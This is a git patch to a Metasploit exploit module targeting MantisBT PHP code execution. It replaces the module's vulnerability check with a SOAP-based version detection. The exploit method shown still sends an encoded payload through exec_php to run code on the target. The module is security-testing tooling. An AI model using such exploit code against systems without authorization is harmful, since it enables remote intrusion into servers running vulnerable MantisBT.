From eaad4e0bea7ea83f54643d5c26084cb8d63d2c78 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Wed, 7 Jan 2015 11:01:08 +0100
Subject: [PATCH] fix check method

---
 .../exploits/multi/http/mantisbt_php_exec.rb  | 55 +++++++++++++++++--
 1 file changed, 50 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb
index d1d7928f86..2e0cafc8ce 100644
--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -48,13 +49,56 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
-  def check
-    res = exec_php('phpinfo(); die();', true)
+  def get_mantis_version
+    xml = Document.new
+    xml.add_element(
+    "soapenv:Envelope",
+    {
+      'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+      'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+      'xmlns:man'     => "http://futureware.biz/mantisconnect"
+    })
+    xml.root.add_element("soapenv:Header")
+    xml.root.add_element("soapenv:Body")
+    body = xml.root.elements[2]
+    body.add_element("man:mc_version",
+      { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
+    )
 
-    if res && res.body && res.body.include?('This program makes use of the Zend')
-      return Exploit::CheckCode::Vulnerable
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'headers'  => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
+      'data'     => xml.to_s
+    })
+    if res && res.code == 200
+      match = res.body.match(/<ns1:mc_versionResponse><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
+      if match && match.length == 2
+        version = match[1]
+        print_status("Detected Mantis version #{version}")
+        return version
+      end
+    end
+
+    print_status("Can not detect Mantis version")
+    return nil
+  end
+
+  def check
+    version = get_mantis_version
+
+    return Exploit::CheckCode::Unknown if version.nil?
+
+    gem_version = Gem::Version.new(version)
+    gem_version_introduced = Gem::Version.new('1.2.0a3')
+    gem_version_fixed = Gem::Version.new('1.2.18')
+
+    if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
+      return Msf::Exploit::CheckCode::Appears
     else
-      return Exploit::CheckCode::Unknown
+      return Msf::Exploit::CheckCode::Safe
     end
   end
 
@@ -317,6 +361,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    get_mantis_version
     unless exec_php(payload.encoded)
       fail_with(Failure::Unknown, 'Exploit failed, aborting.')
     end